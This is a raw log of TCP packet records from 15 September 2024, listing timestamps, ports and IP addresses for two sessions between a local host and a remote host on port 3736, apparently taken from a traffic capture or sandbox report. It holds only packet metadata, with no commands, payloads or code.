Sep 15, 2024 15:02:28.449630022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449646950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449661970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.449666977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449677944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.449704885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.452292919 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.452311039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.457140923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457155943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457231998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.457248926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457288027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457307100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457323074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457336903 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.457341909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457359076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.457375050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.457528114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.458821058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.458898067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.458913088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.458955050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.458965063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.458992958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.459028006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.459039927 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.459047079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.459067106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.459115028 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.460175037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460241079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460275888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460293055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.460294962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460314035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460330963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460365057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460377932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.460382938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.460459948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.468564034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468605042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468622923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468638897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468657017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468661070 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.468673944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468693018 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468703985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.468710899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.468724012 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.468748093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.474126101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.474150896 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502522945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502552986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502567053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502602100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502608061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502620935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502669096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502696991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502711058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502722025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502744913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502767086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502784014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502801895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502801895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502821922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502830982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502840996 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502860069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.502872944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.502911091 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.503309011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503323078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503375053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503396034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.503429890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503446102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503463030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503511906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.503513098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503539085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503552914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.503593922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.505604029 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.505630970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.518651009 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518657923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518671036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518752098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518758059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518770933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518775940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518783092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518793106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518810987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518815994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518835068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518841028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518853903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518857002 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.518857956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.518918991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.524507046 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.524549961 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529376030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529382944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529397011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529449940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529458046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529465914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529476881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529483080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529500961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529506922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529512882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529519081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529520988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529553890 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529582024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529588938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529593945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529601097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529642105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529661894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529668093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529679060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529685020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529690027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529701948 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529706955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.529715061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529735088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.529762983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.532640934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532656908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532663107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532708883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.532748938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532754898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532768011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532773972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532778978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.532799006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.532815933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.533298016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533303976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533314943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533375025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.533386946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533394098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533405066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533411026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533416986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533447027 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.533526897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533569098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533608913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533648968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.533673048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533679008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533684969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533709049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533715010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.533745050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.533761978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.538337946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.538362026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.539995909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540071011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540086031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540119886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540138006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540143967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.540154934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540182114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.540196896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540208101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.540215015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.540261984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.547805071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547869921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547907114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547946930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547965050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547974110 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.547982931 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.547997952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.548001051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.548018932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.548024893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.548059940 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.549604893 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549623013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549658060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549676895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.549679041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549696922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549715042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549736023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.549745083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.549772978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.550805092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550873041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550888062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550905943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550921917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550939083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550939083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.550957918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.550967932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.550995111 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.551009893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.559179068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559243917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.559334993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559350014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559400082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559418917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.559425116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559442997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559461117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559478045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.559478998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.559503078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.580079079 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593144894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593211889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593220949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593280077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593317986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593329906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593337059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593355894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593393087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593394041 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593415976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593432903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593446016 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593451977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593466997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593468904 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593483925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593502045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593513012 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593518972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593538046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593538046 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593602896 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593898058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593913078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593964100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593981028 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.593981981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.593998909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.594032049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.594053984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.594053984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.594074965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.594080925 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.594089031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.594144106 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.606148958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.609380007 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.609400034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.609436989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.609538078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.633290052 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.655925035 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.661194086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:37.609853029 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:37.614797115 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:37.614869118 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:37.614962101 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:37.620100021 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.415060997 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.415079117 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.415092945 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.415183067 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:38.423051119 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:38.427859068 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.642474890 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.642779112 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:38.647700071 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.869421959 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.872231007 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:38.879429102 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:38.879494905 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:38.884306908 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.250111103 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.252820015 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.257600069 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.257679939 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.262419939 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.626204014 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.626215935 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.626380920 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.820885897 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.820939064 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.821042061 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.821109056 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.829794884 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830029964 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830039978 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830049038 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830120087 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830120087 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830171108 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830192089 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830200911 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830209970 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830221891 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830281973 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830285072 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830291986 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830285072 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830296040 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830312014 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830319881 CEST	3736	49706	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:39.830384016 CEST	49706	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:39.830384016 CEST	49706	3736	192.168.2.10	194.113.106.180
